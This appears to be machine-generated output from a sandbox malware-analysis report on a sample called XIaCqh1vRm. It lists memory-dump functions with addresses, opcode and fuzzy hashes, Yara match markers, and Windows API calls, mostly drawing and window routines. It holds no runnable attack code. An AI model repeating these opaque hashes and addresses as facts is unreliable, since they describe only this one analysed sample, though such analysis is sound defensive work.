                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                          • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                          • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                          Function 024A08CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00410672,0249FE60), ref: 024A08D2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                          • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                          • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                          Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                          • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                                          • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                                                                                                                                                                                          Function 004373D9 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                                          • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                                                                                                                                                                                                                          Function 004071AB Relevance: .4, Instructions: 378COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                                                          • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                                                                                                                                                                                          Function 024B76EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                          • Instruction ID: 0d9c5e97eb769fe52307554ece7da4665c320b79a11dbfb4ca4a059b38443d36
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96D1B6331085A24ADB6F4A3A84700BBFFF26E821A530D479FD4F7CA6C2EA24D555D670
                                                                                                                                                                                                                                                                          Function 00427D67 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                          • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                                                                                                                                                                                          Function 024B7FCE Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                          • Instruction ID: 4834b7865edd1a94633a77e7b6be4d9b6cbc1de95510be84c880d8db3e80f095
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B69122721090A34AEB6F463E85741BFFFE55E812A530A079FD4F2CA2C5EF248555DA30
                                                                                                                                                                                                                                                                          Function 00428022 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                          • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                                                                                                                                                                                                                          Function 024B8289 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                          • Instruction ID: 6b294422089193adff9595540bd462b67c54910d460a54a17f1fff1e00cfa154
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 799140721090A34AEB6B467E85741BFFFE55E821A630A079FD4F2CA2C5FE24C165D630
                                                                                                                                                                                                                                                                          Function 00427AA0 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                          • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                                                                                                                                                                                          Function 024B7D07 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                          • Instruction ID: 9798d8fffb95db3bf105ee70dbcca8f3b25c487433f8b1ebdb393c604614fcd0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 089132731090A20ADB6B463D85781BEFFE19EC11A570A079FE4F2CE2C5EE14D665D630
                                                                                                                                                                                                                                                                          Function 0042D4EE Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                          • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                                                                                                                                                                                          Function 024BD755 Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                          • Instruction ID: 688709eccc1ef3f81edecbb1763f3103fff13e7f483b4a73f817d2801b0b7a58
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1615631E00B05D6DE3B6A288890BFF63959F45A09F0408EFE886DB7C0D7159983C7B5
                                                                                                                                                                                                                                                                          Function 004277F6 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                          • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                                                                                                                                                                                                                                          Function 024B7A5D Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                          • Instruction ID: e5c583b9e42432bcbcce1d8c06ee20fb03f0bd12f5c2ea791361366529730c3b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 738132732080A349EB6B463984740BFFFF15E821A630A079FD4F2CA2C5EE148265D630
                                                                                                                                                                                                                                                                          Function 00428560 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                          • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                                                                                                                                                                                          Function 024B87C7 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                          • Instruction ID: c76349d59dff7fe9183b9445d4fef866c30eb5f162c9bd02aa940add7f0fda4c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE11C477200042479E5B8A3ED8B46FBE79EEEC6228B2D567BD0414B758D322E145D620
                                                                                                                                                                                                                                                                          Function 00A09D6B Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A09000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_a09000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                          • Instruction ID: 084d187eecf8f6a5e7fba0351dd8ea94db7fdb91763d15ff6fb101facb45fcb8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8118E72380104AFDB44DF55EC91FA773EAEB88320B298165ED08CB356E675EC01C760
                                                                                                                                                                                                                                                                          Function 02490D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                          • Instruction ID: 316fab75cdca8c204f77335740380c5cf636f58c06b371094cabf143150724a7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0301D676A106048FDF21CF24C904BAB37F9FB86216F4555B6D90AD7381E774A941CB90
                                                                                                                                                                                                                                                                          Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040214A
                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00402151
                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                                                                                                                                                                                                                          • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                                                                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                                                                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040227F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                                                          • String ID: Tahoma
                                                                                                                                                                                                                                                                          • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                                                          • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                          • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                                                                                                                                                                                          Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                                                                                                                                                                                          • ReleaseCapture.USER32 ref: 004025F2
                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00402619
                                                                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004026B3
